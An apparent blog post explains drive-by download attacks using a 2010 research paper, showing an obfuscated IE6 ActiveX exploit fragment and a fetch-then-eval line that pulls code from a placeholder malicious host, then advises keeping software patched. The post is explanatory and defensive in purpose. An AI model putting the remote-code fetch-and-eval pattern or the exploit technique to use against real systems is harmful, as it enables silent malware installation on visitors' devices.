We all know better than to click on random links. Malware and scams frequently hide behind a mysterious looking url, yet a part of me – driven by curiosity – wonders what lies beyond that click. However I never satisfy that desire because I am uncertain of the mechanisms of how malware could end up on my device. In this post I take away my ignorance on the topic by diving into the nitty gritty technical details of a drive-by download attack.

I am basing this on a widely cited (924 according to Google Scholar) paper from 2010.

Marco Cova, Christopher Kruegel, and Giovanni Vigna: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

In a drive-by download, malware is downloaded to a website visitor’s pc without the user’s awareness or consent. A high level overview is illustrated in the paper.

Suppose the user clicks on a malicious link taking them to a website. Nothing seems to happen, however behind the scenes there is a script tag in the HTML that loads an invisible iframe with a length and withd of 0 into the browser. The website in that iframe uses the user-agent http header to determine which browser and os version the victim is using. Based on that information the website can return different JS scripts that target known vulnerabilities in those versions. An example of a malicious script loaded by a user using Internet Explorer 6.1 running on Windows XP is shown below.

1 function a9_bwCED() {
2   var OBGUiGAa = new ActiveXObject(’Sb.SuperBuddy’);
3   if (OBGUiGAa) {
4     Exhne69P();
5     OBGUiGAa.LinkSBIcons(0x0c0c0c0c);
6   }
7   return 0;
8 }
9 if (a9_bwCED() || g0UnHabs() || P9i182jC()) { ... }

The script tries multiple functions to get a successful exploit. We are showing the function a9_bwCED here, but the others are similar. It first instantiates a vulnerable component (in this case the SuperBudy control, but it can be different for other user agents). If that component is successfully instantiated, it calls Exhne69P which puts malicious shellcode in the heap memory of the process. On line 5 an integer overflow vulnerability is exploited, if successfull this will cause the injected shellcode to execute. The malicious shellcode could install malware on your pc, encrypt your files or put your device in a botnet.

Unfortunately it’s hard to statically detect malicious scripts because of the dynamic features provided by Javascript. The eval() function makes it possible to run code that is provided as a string argument. This makes it possible to fetch the javascript code from a remote webserver at runtime, so that static malware detection tools can’t see what will be executed in the eval function.

fetch('http://malicious.example.com/malicious-script.js')
  .then(response => response.text())
  .then(code => eval(code));

How to protect yourself

You may have noticed that this whole operation relies on the fact that you have a user agent that has exploitable vulnerabilities. To greatly decrease your chances of being vulnerable you should always update your os and browser so that you get the latest security patches.

Full disclosure

I don’t know how relevant this work is for 2024, but it was certainly interesting to me and a nice beginning to answer the question: “How does malware end up on your pc by clicking on a malicious link?”